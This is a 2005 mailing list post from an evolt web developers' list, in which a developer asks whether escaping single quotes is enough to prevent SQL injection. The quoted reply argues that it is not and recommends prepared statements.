[thelist] Re: Avoiding SQL Injection

Mon Mar 21 23:16:26 CST 2005

> a system of simply escaping single quotes when inserting data from your users
> is *not* sufficient for preventing every time of malicious attack against
> your application.

I am not disagreeing, but I am curious. Can you supply a single
example when this is not enough? Prepared statements might make
writing the application program easier, but if an application escapes
all strings and checks validity of numbers
<emphasis>everytime</emphasis>  when building SQL statements, how
could SQL injection still be possible? Escaping strings should not
only be limited to user input, but also data coming from the database
which an attacker could sneak in.

On Tue, 22 Mar 2005 14:07:58 +1100, Ken Schaefer <Ken at adopenstatic.com> wrote:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> : From: thelist-bounces at lists.evolt.org [mailto:thelist-
> : bounces at lists.evolt.org] On Behalf Of Brooking, John
> : Subject: [thelist] Re: Avoiding SQL Injection
> : 
> : I do believe you may be right, because the fact that 
> : I'm storing it in a string column means that
> : a SQL attack string is going to have a close the quote 
> : that I opened in my code in order to get the rest of 
> : his nefarious scheme to parse correctly. So by definition, 
> : it has at least one single quote, so escaping all single
> : quotes will prevent any other potential special characters, 
> : such as semi-colons, from being evaluated as anything 
> : other than characters inside a string. I hadn't 
> : thought that through before!
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> I am preparing a response to Joshua's previous post. However, as I
> mentioned,
> a system of simply escaping single quotes when inserting data from your
> users
> is *not* sufficient for preventing every time of malicious attack against
> your application. 
> 
> This is not a simple topic - advanced SQL Injection attacks are not
> trivial,
> and so presenting something concise that also sufficiently demonstrates the
> point isn't a quick-n-easy post for me (especially since it's not an area I
> deal with day-in and day-out, and so I don't have anything pre-canned I can
> send to the list)
> 
> Use prepared statements. JDBC has stuff for this. ADO has stuff for this.
> ADO.NET as well. I don't know what PHP uses to connect to mySQL, but
> magic_quotes and is_int are not sufficient safeguards against every time to
> attack if you are building SQL inline in your PHP code.
> 
> Cheers
> Ken
> 
> --
> www.adOpenStatic.com/cs/blogs/ken/
> -- 
> 
> * * Please support the community that supports you.  * *
> http://evolt.org/help_support_evolt/
> 
> For unsubscribe and other options, including the Tip Harvester 
> and archives of thelist go to: http://lists.evolt.org 
> Workers of the Web, evolt ! 
> 

-- 
Take back the web!
http://www.spreadfirefox.com